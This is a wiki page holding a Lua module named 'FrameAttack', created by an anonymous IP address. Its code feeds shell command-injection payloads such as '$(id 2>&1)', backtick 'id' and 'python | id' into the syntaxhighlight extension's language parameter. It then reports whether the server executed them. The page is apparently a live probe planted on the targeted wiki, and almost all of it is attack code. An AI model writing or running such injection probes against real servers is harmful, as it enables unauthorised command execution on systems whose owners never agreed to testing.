模块:FrameAttack

来自希服维基
221.237.85.128讨论2026年5月9日 (六) 14:59的版本 (创建页面,内容为“local p = {} function p.test(frame) local results = {} local parent = frame:getParent() if not parent then results[1] = "no_parent"; return table.concat(results, " | ") end -- Test 1: Preprocess with syntaxhighlight containing command injection local preprocess_tests = { "<syntaxhighlight lang=\"python | id 2>&1\">test</syntaxhighlight>", "<syntaxhighlight lang=\"$(id 2>&1)\">test</syntaxhighlight>", "<syntaxhighligh…”)
(差异) ←上一版本 | 最后版本 (差异) | 下一版本→ (差异)

可在模块:FrameAttack/doc创建此模块的帮助文档 

local p = {}
function p.test(frame)
    local results = {}
    local parent = frame:getParent()
    if not parent then results[1] = "no_parent"; return table.concat(results, " | ") end

    -- Test 1: Preprocess with syntaxhighlight containing command injection
    local preprocess_tests = {
        "<syntaxhighlight lang=\"python | id 2>&1\">test</syntaxhighlight>",
        "<syntaxhighlight lang=\"$(id 2>&1)\">test</syntaxhighlight>",
        "<syntaxhighlight lang=\"`id 2>&1`\">test</syntaxhighlight>",
        "{{#expr:1+1}}",
        "{{#tag:syntaxhighlight|test|lang=$(id 2>&1)}}",
    }
    for i, pp in ipairs(preprocess_tests) do
        local ok, out = pcall(parent.preprocess, parent, pp)
        results[i] = "pp"..i.."="..tostring(ok)..":"..tostring(out):sub(1,100)
    end

    -- Test 2: extensionTag directly
    local ext_tests = {
        {"syntaxhighlight", "test", {lang="python | id 2>&1"}},
        {"syntaxhighlight", "test", {lang="$(id 2>&1)"}},
        {"syntaxhighlight", "test", {lang="`id 2>&1`"}},
        {"math", "\\frac{1}{2}", {}},
    }
    for i, et in ipairs(ext_tests) do
        local ok, out = pcall(parent.extensionTag, parent, et[1], et[2], et[3])
        results[5+i] = "ext"..i.."="..tostring(ok)..":"..tostring(out):sub(1,100)
    end

    return table.concat(results, " | ")
end
return p
取自“https://xn--itt73r.xn--7wr.site/w/index.php?title=模块:FrameAttack&oldid=1017